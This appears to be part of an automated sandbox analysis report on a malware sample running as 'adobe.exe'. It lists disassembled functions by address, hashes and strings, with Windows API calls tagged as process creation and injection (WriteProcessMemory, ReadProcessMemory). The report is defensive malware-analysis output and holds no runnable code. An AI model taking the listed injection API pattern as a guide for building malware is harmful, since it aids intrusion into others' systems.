Function 063D3B67 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4145989982.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_63d0000_BL NBNSA240600050.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f855c709895e2d215b05f6d9c0f9c66fd986d505520cdbe1054743fdc5a5cbff
Instruction ID: 783db250784737be14f20b441bf91fb7ec0c6d8f6d64c75ed2e65b11d9c94594
Opcode Fuzzy Hash: f855c709895e2d215b05f6d9c0f9c66fd986d505520cdbe1054743fdc5a5cbff
Instruction Fuzzy Hash: A201D436B101144BEF949A6D98146AF73EFDBCA710F04443AC506E3284EF649C0687E2

Function 063D3838 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4145989982.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_63d0000_BL NBNSA240600050.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c59acd4e0d39716e3d4696158c8dfa69ba766f39713af41ded154663ef2cfba4
Instruction ID: e312cef21800874c094c1ddee84c18082e2491074386148d56cb0c8a4e97486c
Opcode Fuzzy Hash: c59acd4e0d39716e3d4696158c8dfa69ba766f39713af41ded154663ef2cfba4
Instruction Fuzzy Hash: CE11D0B5D01259AFCB00CF9AD884ACEFBB4FB49320F10812AE918A7340D374A944CFE5

Function 063D3DC0 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4145989982.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_63d0000_BL NBNSA240600050.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 816ec679689866b129fc803263b88e2dbdf83be432a870641302430309cb749d
Instruction ID: 170d445c62e12ef76452f32da59f3d75658f7ee108324630eef4018a356e9ea6
Opcode Fuzzy Hash: 816ec679689866b129fc803263b88e2dbdf83be432a870641302430309cb749d
Instruction Fuzzy Hash: 62018137B104110BEBA4997DA45072BF3DADBCAB20F108839E50AC7388EE62DC4643D6

Function 063DED20 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4145989982.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_63d0000_BL NBNSA240600050.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: efb881d241346c8253c3e162b96d711a634dd31149ff8312470ed4b86c7f2b07
Instruction ID: 52c21997d501bdea506d202dafcbfc1202393871bfbef5c52e68455c729d3cc2
Opcode Fuzzy Hash: efb881d241346c8253c3e162b96d711a634dd31149ff8312470ed4b86c7f2b07
Instruction Fuzzy Hash: 9A01A436B104111FCB65997CA85073FABDADFC9764F148839E50ACB358EE15DC0643D5

Function 063D9E88 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4145989982.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_63d0000_BL NBNSA240600050.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4539abdfe093b4334c4a81dcebf5df11f967d7fe5ee3a6cb5fc402b4e8b8b778
Instruction ID: 893657cb5eff5f9d57f785d981af5c3e98b33737b5bf0e56bdfd77e1a156e6d2
Opcode Fuzzy Hash: 4539abdfe093b4334c4a81dcebf5df11f967d7fe5ee3a6cb5fc402b4e8b8b778
Instruction Fuzzy Hash: 35018136B100104FCBA4AA7CE45072BB3DAEB86710F108829E60EC7784EF31EC0587C1

Function 063DC758 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4145989982.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_63d0000_BL NBNSA240600050.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c50d9e6fc812ae42216469ad6e82bde487961b3d8c8170cad168de5c1275835
Instruction ID: 8424f916c7b3bd3db7d8a309b441a09a4dff6029c12f21ca991939bdac70b2d6
Opcode Fuzzy Hash: 4c50d9e6fc812ae42216469ad6e82bde487961b3d8c8170cad168de5c1275835
Instruction Fuzzy Hash: B5F0A732E30224ABDB146965E800A9AB77EE784754F104425E901E7388DB316905C7D0

Function 063D5FE1 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4145989982.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_63d0000_BL NBNSA240600050.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f23b8b1ad90cd7a1a5e98a1ef4edd9f9a005c5e81806ef5422042330c2a1e8d7
Instruction ID: df07516eeed2bc3b193a530e6168e358e97b628c828221415ae038eb35d86a03
Opcode Fuzzy Hash: f23b8b1ad90cd7a1a5e98a1ef4edd9f9a005c5e81806ef5422042330c2a1e8d7
Instruction Fuzzy Hash: 1BE0D872D18248ABDF60CE70C94635AB7EDDB03314F2048B9D449CB141E277C90A9B91

Non-executed Functions

Function 063D7218 Relevance: 13.0, Strings: 10, Instructions: 468COMMON

Download Yara Rule

Strings

$kq, xrefs: 063D77BE
$kq, xrefs: 063D77CA
$kq, xrefs: 063D77A8
$kq, xrefs: 063D7715
$kq, xrefs: 063D737D
$kq, xrefs: 063D7389
$kq, xrefs: 063D7709
$kq, xrefs: 063D734C
$kq, xrefs: 063D7358
$kq, xrefs: 063D77B4

Memory Dump Source

Source File: 00000002.00000002.4145989982.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_63d0000_BL NBNSA240600050.jbxd

Similarity

API ID:
String ID: $kq$$kq$$kq$$kq$$kq$$kq$$kq$$kq$$kq$$kq
API String ID: 0-1324371161
Opcode ID: 6b2170d83bcc2b14c6e4d6d7f2e0eeeb25959d3e8239b47f85df049740fcba4c
Instruction ID: 1e29a41cb513dc8556101836c692330b62ee33b33b2317bdefa4fed6352fea1b
Opcode Fuzzy Hash: 6b2170d83bcc2b14c6e4d6d7f2e0eeeb25959d3e8239b47f85df049740fcba4c
Instruction Fuzzy Hash: 42122A31E012198FDB64DF69D954AAEB7F2BF88300F208569D40AAB365DB34DD85CF90

Function 063DA4A8 Relevance: 10.2, Strings: 8, Instructions: 229COMMON

Download Yara Rule

Strings

$kq, xrefs: 063DA5AA
$kq, xrefs: 063DA624
$kq, xrefs: 063DA5F9
$kq, xrefs: 063DA59E
$kq, xrefs: 063DA65A
$kq, xrefs: 063DA666
$kq, xrefs: 063DA630
$kq, xrefs: 063DA605

Memory Dump Source

Source File: 00000002.00000002.4145989982.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_63d0000_BL NBNSA240600050.jbxd

Similarity

API ID:
String ID: $kq$$kq$$kq$$kq$$kq$$kq$$kq$$kq
API String ID: 0-1078448309
Opcode ID: 5b5df1c3ec0690674af151b5aa660fe38c07de63ef30edad094092e79d71ba3b
Instruction ID: ccfe4fb8e8ce36802e065710970c74730ec97ce519fb302d695a14679a3e064a
Opcode Fuzzy Hash: 5b5df1c3ec0690674af151b5aa660fe38c07de63ef30edad094092e79d71ba3b
Instruction Fuzzy Hash: 45917231A10209DFDB64EFA8E654BAEBBF6BF44300F208529E40197799DB789D45CBD0

Function 063D6C18 Relevance: 7.9, Strings: 6, Instructions: 405COMMON

Download Yara Rule

Strings

$kq, xrefs: 063D6F60
$kq, xrefs: 063D70B4
$kq, xrefs: 063D712C
$kq, xrefs: 063D6F54
$kq, xrefs: 063D6EFA
$kq, xrefs: 063D7120

Memory Dump Source

Source File: 00000002.00000002.4145989982.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_63d0000_BL NBNSA240600050.jbxd

Similarity

API ID:
String ID: $kq$$kq$$kq$$kq$$kq$$kq
API String ID: 0-1342094364
Opcode ID: ccb1f3565232a0dcc8f9329db600250994de6d47f90b07567cb6257a54823571
Instruction ID: 0c9b849cb44b306a602a71df88de15b705cec235045306e8b271795867885311
Opcode Fuzzy Hash: ccb1f3565232a0dcc8f9329db600250994de6d47f90b07567cb6257a54823571
Instruction Fuzzy Hash: 51F16C34A01208DFDB54EF64D554B6EBBB6FF89300F208529E4059B3A9DB35EC86CB90

Function 063DB978 Relevance: 7.7, Strings: 6, Instructions: 197COMMON

Download Yara Rule

Strings

$kq, xrefs: 063DBAF7
$kq, xrefs: 063DBB53
$kq, xrefs: 063DBAEB
$kq, xrefs: 063DBB2B
$kq, xrefs: 063DBB5F
$kq, xrefs: 063DBB1F

Memory Dump Source

Source File: 00000002.00000002.4145989982.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_63d0000_BL NBNSA240600050.jbxd

Similarity

API ID:
String ID: $kq$$kq$$kq$$kq$$kq$$kq
API String ID: 0-1342094364
Opcode ID: 66fbecb31c8a9968cedbeae1df8ff263544181806c3bc5e83714065591741048
Instruction ID: 9cd691678c8c1b98efe59964ca60d8715ac6d406cc4872549009441603898787
Opcode Fuzzy Hash: 66fbecb31c8a9968cedbeae1df8ff263544181806c3bc5e83714065591741048
Instruction Fuzzy Hash: A271B0B2E102098FDB68DF65E5906AEF7E6FF84300B118529D0069B398DB71ED49CBC0

Function 063D7F50 Relevance: 5.3, Strings: 4, Instructions: 282COMMON

Download Yara Rule

Strings

$kq, xrefs: 063D81B6
$kq, xrefs: 063D81AA
$kq, xrefs: 063D821B
$kq, xrefs: 063D820F

Memory Dump Source

Source File: 00000002.00000002.4145989982.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_63d0000_BL NBNSA240600050.jbxd

Similarity

API ID:
String ID: $kq$$kq$$kq$$kq
API String ID: 0-2881790790
Opcode ID: 12f8c6b069c790dbbc74131f16c16dfa82aa3a9db295d068876e05ce22dc0472
Instruction ID: c9c9899d7671986575c2fe2d5c8a3006fcbb7ceeedd49e170c01d68bac770c28
Opcode Fuzzy Hash: 12f8c6b069c790dbbc74131f16c16dfa82aa3a9db295d068876e05ce22dc0472
Instruction Fuzzy Hash: 5EB14D31A012099FDB64EF68D9507AEB7B2FF85304F248529E4099B395DB35EC86CB90

Function 063DE312 Relevance: 5.2, Strings: 4, Instructions: 202COMMON

Download Yara Rule

Strings

DqNp, xrefs: 063DE3CC
0oNp, xrefs: 063DE3C0
PHkq, xrefs: 063DE588
], xrefs: 063DE302

Memory Dump Source

Source File: 00000002.00000002.4145989982.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_63d0000_BL NBNSA240600050.jbxd

Similarity

API ID:
String ID: 0oNp$DqNp$PHkq$]
API String ID: 0-3879191310
Opcode ID: 07636d64dbaa1915655cbaca70217ce0ba9fff2d553470581929d64bfa128ad3
Instruction ID: e25e3a05c8f0ac43558a245601db4fca1e03e4d81a0ddffb02334dc55dd86d2a
Opcode Fuzzy Hash: 07636d64dbaa1915655cbaca70217ce0ba9fff2d553470581929d64bfa128ad3
Instruction Fuzzy Hash: F0814A357101018FCB94DF28E994A6EBBE2EF89310B2585A9E406DF375DB35EC45CB90

Function 063D8368 Relevance: 5.2, Strings: 4, Instructions: 168COMMON

Download Yara Rule

Strings

LRkq, xrefs: 063D845B
$kq, xrefs: 063D83F3
$kq, xrefs: 063D83E7
LRkq, xrefs: 063D84AA

Memory Dump Source

Source File: 00000002.00000002.4145989982.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_63d0000_BL NBNSA240600050.jbxd

Similarity

API ID:
String ID: LRkq$LRkq$$kq$$kq
API String ID: 0-2392252538
Opcode ID: 8a60a34a0106435a2d7ba9375907f8ccffb4ba33768ac68b870d29eccee18516
Instruction ID: 58d9f4b8338319762f3ebddd7cd5fabce8d4fabbd7bc691b7bede654476452f9
Opcode Fuzzy Hash: 8a60a34a0106435a2d7ba9375907f8ccffb4ba33768ac68b870d29eccee18516
Instruction Fuzzy Hash: EB51A031B002019FDB54EB68E950A6AB7F6FF89300F148569E4069B3A9DB35FC45CBD0

Function 063DA828 Relevance: 5.2, Strings: 4, Instructions: 162COMMON

Download Yara Rule

Strings

$kq, xrefs: 063DA959
$kq, xrefs: 063DA9AC
$kq, xrefs: 063DA9DB
$kq, xrefs: 063DAA04

Memory Dump Source

Source File: 00000002.00000002.4145989982.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_63d0000_BL NBNSA240600050.jbxd

Similarity

API ID:
String ID: $kq$$kq$$kq$$kq
API String ID: 0-2881790790
Opcode ID: eb001009399bc7a3b726b225607d6373116f3335f935736d84a8e43f686c2f0b
Instruction ID: f61a0e8ac3d61a533bb69a71d8839c7c3b432bcf197bebce7034a3bfdbb7bcf8
Opcode Fuzzy Hash: eb001009399bc7a3b726b225607d6373116f3335f935736d84a8e43f686c2f0b
Instruction Fuzzy Hash: 4F51AF31E102099FCFA4DB64E6806AEB7F2EB85300F24852AD405DB385DB35EC46CB91

Analysis Process: adobe.exePID: 3312, Parent PID: 2580COMMON

Execution Graph

Execution Coverage:	10%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	183
Total number of Limit Nodes:	14

Executed Functions

Function 08AA30F8 Relevance: 7.0, Strings: 5, Instructions: 739
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Tekq, xrefs: 08AA353B
poq, xrefs: 08AA3819
xbnq, xrefs: 08AA3146
TJpq, xrefs: 08AA316E
4'kq, xrefs: 08AA37DA

Memory Dump Source

Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd

Similarity

API ID:
String ID: 4'kq$TJpq$Tekq$poq$xbnq
API String ID: 0-2301093937
Opcode ID: dcfcb93abc633d31184433488a447040d05cafa9c4e37eb4974b169b2c70b2df
Instruction ID: 7bff665a0fb6d84d7a47d6936b6d136a67692bdc2379598aae87f458f1e0cc64
Opcode Fuzzy Hash: dcfcb93abc633d31184433488a447040d05cafa9c4e37eb4974b169b2c70b2df
Instruction Fuzzy Hash: E4621575A00618DFDB14DFA8C984B69BBB2FF48305F1581A8E509AB766DB31EC52CF40

Function 070B64EC Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 248
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 070B672E

Strings

$F6A, xrefs: 070B6562
$F6A, xrefs: 070B6533

Memory Dump Source

Source File: 00000003.00000002.1817896025.00000000070B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70b0000_adobe.jbxd

Similarity

API ID: CreateProcess
String ID: $F6A$$F6A
API String ID: 963392458-1049683302
Opcode ID: 2f912a4662549f425d21746749dc5da2550f2caa9035006918f9aacbeedc8c15
Instruction ID: 3a33e10ff58933329cd10fd2cd502afa489d22b549bd7e2e0a71beda6ab4f9cc
Opcode Fuzzy Hash: 2f912a4662549f425d21746749dc5da2550f2caa9035006918f9aacbeedc8c15
Instruction Fuzzy Hash: B5A14CB1D0021ADFDB24CF68C840BDDBBF2BF48314F1486A9D849A7254DB759A85CF91

Function 070B64F8 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 070B672E

Strings

$F6A, xrefs: 070B6562
$F6A, xrefs: 070B6533

Memory Dump Source

Source File: 00000003.00000002.1817896025.00000000070B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70b0000_adobe.jbxd

Similarity

API ID: CreateProcess
String ID: $F6A$$F6A
API String ID: 963392458-1049683302
Opcode ID: 322b348a40d35d1ef771261f7f409bcc1139e6237634bdffe41439f2ca75cbdb
Instruction ID: d448cae3d3046246dfd2466cad64e43f53a2d51e7494864fb446a220755a12e4
Opcode Fuzzy Hash: 322b348a40d35d1ef771261f7f409bcc1139e6237634bdffe41439f2ca75cbdb
Instruction Fuzzy Hash: AF913CB1D0021ADFDB24CFA8C940BDDBBF2BF48314F1486A9D809A7254DB759A85CF91

Function 08AA0D58 Relevance: 5.3, Strings: 4, Instructions: 289
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(oq, xrefs: 08AA0F9C
Hoq, xrefs: 08AA0EE6
$F6A, xrefs: 08AA116F
$F6A, xrefs: 08AA100E

Memory Dump Source

Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd

Similarity

API ID:
String ID: $F6A$$F6A$(oq$Hoq
API String ID: 0-1823700412
Opcode ID: 7c994c9f32ab6d5fe7765df70edd0e53df75e64c6f5a37b2ae41bc49324bd79d
Instruction ID: c8c9d65c458ffa079e4b4f7813b1b9db4de1a21360b6fa115db0c970ff402380
Opcode Fuzzy Hash: 7c994c9f32ab6d5fe7765df70edd0e53df75e64c6f5a37b2ae41bc49324bd79d
Instruction Fuzzy Hash: 95B19E71E002089FDB14DFA9C5947AEBBF6FF88300F24842EE406AB794DB749946CB55

Function 08AA4A3E Relevance: 5.2, Strings: 4, Instructions: 167
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$kq, xrefs: 08AA4AE2
$kq, xrefs: 08AA4AD6
$kq, xrefs: 08AA4B47
$kq, xrefs: 08AA4B53

Memory Dump Source

Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd

Similarity

API ID:
String ID: $kq$$kq$$kq$$kq
API String ID: 0-2881790790
Opcode ID: 6c01ec6b42f194e634736ebda36a094b4ec89954dc2eca2952cca7b14d786c70
Instruction ID: 9e8bbc70207860065dbefbeed12cb33c697253c8beaedc46c03e3cd81f552797
Opcode Fuzzy Hash: 6c01ec6b42f194e634736ebda36a094b4ec89954dc2eca2952cca7b14d786c70
Instruction Fuzzy Hash: 885180747002048FD718AB78D955BAE7BF7FB88715F249028F906AB799CE359C02CB94

Function 011CB1B0 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 197
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 011CB406

Strings

$F6A, xrefs: 011CB3BF

Memory Dump Source

Source File: 00000003.00000002.1812914544.00000000011C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11c0000_adobe.jbxd

Similarity

API ID: HandleModule
String ID: $F6A
API String ID: 4139908857-4072994420
Opcode ID: 5e2bf4fa24e1eebfc03810457ac6dc3637e297d11310d98534925af4fb9afa65
Instruction ID: 6c6d446d555ba2382ac0cb4385d6a9bb8764e6c96f054cd8a1d63c18f99b8133
Opcode Fuzzy Hash: 5e2bf4fa24e1eebfc03810457ac6dc3637e297d11310d98534925af4fb9afa65
Instruction Fuzzy Hash: 31716670A00B058FD728DF6AD14175ABBF2FF98744F00892ED48ADBA50D735E94ACB94

Function 011C590C Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 99
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 011C59C9

Strings

$F6A, xrefs: 011C594C

Memory Dump Source

Source File: 00000003.00000002.1812914544.00000000011C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11c0000_adobe.jbxd

Similarity

API ID: Create
String ID: $F6A
API String ID: 2289755597-4072994420
Opcode ID: 6d4b7cb248eef5971cfef910dbc9c514ae5b3c6c3a2add425ee8709c670d16b1
Instruction ID: caf50883a4a6e91a234d79ecba137b10b5dd3259ff8662c601e282e64025fdab
Opcode Fuzzy Hash: 6d4b7cb248eef5971cfef910dbc9c514ae5b3c6c3a2add425ee8709c670d16b1
Instruction Fuzzy Hash: 2741D5B0D00719DFDB24CFA9C9847CDBBB5BF49704F24806AD408AB255DB756946CF90

Function 011C44B0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 011C59C9

Strings

$F6A, xrefs: 011C594C

Memory Dump Source

Source File: 00000003.00000002.1812914544.00000000011C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11c0000_adobe.jbxd

Similarity

API ID: Create
String ID: $F6A
API String ID: 2289755597-4072994420
Opcode ID: 60a5e7bc2359f6ec0c58ea4c4170be7cc17e20bdc5278089ad60b55061d6448f
Instruction ID: fd60148d99f05e155a9c1732d9fd26fa91dc8fd9b5be49d74c0a9c9abed497ed
Opcode Fuzzy Hash: 60a5e7bc2359f6ec0c58ea4c4170be7cc17e20bdc5278089ad60b55061d6448f
Instruction Fuzzy Hash: 0C41D4B0D00719CBDB24CFAAC8447CEBBB6BF49704F248059D408AB255DB75A945CF90

Function 05C25038 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 72
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DrawTextExW.USER32(?,?,?,?,?,?), ref: 05C250D7

Strings

$F6A, xrefs: 05C25065

Memory Dump Source

Source File: 00000003.00000002.1817310629.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5c20000_adobe.jbxd

Similarity

API ID: DrawText
String ID: $F6A
API String ID: 2175133113-4072994420
Opcode ID: e0a009a9444341c398d07e434db2742780b2809b5f11e6e025b55049d06a055b
Instruction ID: d181d4de8bb2268aae04db77d6c1e17bdeafcfa3932a7deeebd9062f8af57719
Opcode Fuzzy Hash: e0a009a9444341c398d07e434db2742780b2809b5f11e6e025b55049d06a055b
Instruction Fuzzy Hash: 4B31C3B5D002599FDB10CF9AD884ADEFBF4FB48320F14842AE919A7310D775A944CFA5

Function 070B6269 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 72
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 070B6300

Strings

$F6A, xrefs: 070B628F

Memory Dump Source

Source File: 00000003.00000002.1817896025.00000000070B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70b0000_adobe.jbxd

Similarity

API ID: MemoryProcessWrite
String ID: $F6A
API String ID: 3559483778-4072994420
Opcode ID: d56d704162aca9202cba090d2a9f7af257ff7945e0649f69ce8a2e42d04b25d6
Instruction ID: 482ff74e60a8ef60cb66c066d8216609b67fa24dbe9553a10b0f1ac81b390fbf
Opcode Fuzzy Hash: d56d704162aca9202cba090d2a9f7af257ff7945e0649f69ce8a2e42d04b25d6
Instruction Fuzzy Hash: 0D2148B19003599FCB10CFA9C881BDEBBF5FF48310F14882AE999A7251D7789954CBA4

Function 05C25040 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 69
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DrawTextExW.USER32(?,?,?,?,?,?), ref: 05C250D7

Strings

$F6A, xrefs: 05C25065

Memory Dump Source

Source File: 00000003.00000002.1817310629.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5c20000_adobe.jbxd

Similarity

API ID: DrawText
String ID: $F6A
API String ID: 2175133113-4072994420
Opcode ID: 1662f30c5a3893da2cbb8155eb7e29c2c6116120b12331c4307f70d6fb3fa551
Instruction ID: d4524459ede404835535b267cf7c987398844a1f88c052ac46a2003c2a181fa9
Opcode Fuzzy Hash: 1662f30c5a3893da2cbb8155eb7e29c2c6116120b12331c4307f70d6fb3fa551
Instruction Fuzzy Hash: E121D2B5D002599FDB10CF9AD884ADEFBF4FB48320F14842AE919A7210D775A944CFA5

Function 070B6270 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 070B6300

Strings

$F6A, xrefs: 070B628F

Memory Dump Source

Source File: 00000003.00000002.1817896025.00000000070B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70b0000_adobe.jbxd

Similarity

API ID: MemoryProcessWrite
String ID: $F6A
API String ID: 3559483778-4072994420
Opcode ID: ddaaac3d0c91c5371a5cda044d0501ba1e6483a5a544e013a0f17db810f14953
Instruction ID: 81ccf5fabb78d9831bfadb6e3dc590690f601a8c20ce03dce3cb0759a2cc5f92
Opcode Fuzzy Hash: ddaaac3d0c91c5371a5cda044d0501ba1e6483a5a544e013a0f17db810f14953
Instruction Fuzzy Hash: F92127B1900359DFCB10CFA9C885BDEBBF5FF48320F108429E958A7250C7799954CBA4

Function 011CCFB0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,011CD62E,?,?,?,?,?), ref: 011CD6EF

Strings

$F6A, xrefs: 011CD687

Memory Dump Source

Source File: 00000003.00000002.1812914544.00000000011C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11c0000_adobe.jbxd

Similarity

API ID: DuplicateHandle
String ID: $F6A
API String ID: 3793708945-4072994420
Opcode ID: 8af8fa94d970e1ef2aebe14442fd520a32b5006f57e0b7893eeea4292ecf0a5f
Instruction ID: 280911a4465cb8dc7c2a2731b001f98e5942605dc7212faa65431284d07b61dd
Opcode Fuzzy Hash: 8af8fa94d970e1ef2aebe14442fd520a32b5006f57e0b7893eeea4292ecf0a5f
Instruction Fuzzy Hash: E521E5B5900258AFDB10CF99D584ADEBFF4FB48314F14802AE918A7350D374A954CFA5

Function 070B6358 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 070B63E0

Strings

$F6A, xrefs: 070B637F

Memory Dump Source

Source File: 00000003.00000002.1817896025.00000000070B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70b0000_adobe.jbxd

Similarity

API ID: MemoryProcessRead
String ID: $F6A
API String ID: 1726664587-4072994420
Opcode ID: 9da13a53d576960c86983b831bd278ff8e3ea930379667ac51a4fd8a0138d663
Instruction ID: e3798d39213608d03349d047d5cd95a23218bdf4fc36fc99e053330cb0a0685b
Opcode Fuzzy Hash: 9da13a53d576960c86983b831bd278ff8e3ea930379667ac51a4fd8a0138d663
Instruction Fuzzy Hash: 662128B1D003599FCB10DFA9C884AEEFBF5FF48320F14842AE559A7250C7799944CB64

Function 070B6360 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 070B63E0

Strings

$F6A, xrefs: 070B637F

Memory Dump Source

Source File: 00000003.00000002.1817896025.00000000070B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70b0000_adobe.jbxd

Similarity

API ID: MemoryProcessRead
String ID: $F6A
API String ID: 1726664587-4072994420
Opcode ID: e5a8767b107423c2bf61fab91498b552b6db9bee9b804987225085e6ce6a37f0
Instruction ID: 33e922b52c57b89e05d16e16488a27fe8bd54687324d7bbc453be94495bae712
